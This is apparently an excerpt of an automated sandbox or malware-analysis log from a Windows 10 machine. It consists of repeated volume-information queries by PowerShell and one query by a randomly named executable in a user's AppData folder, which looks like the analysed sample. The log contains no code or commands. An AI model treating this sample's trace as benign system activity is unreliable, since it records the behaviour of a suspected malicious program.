Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
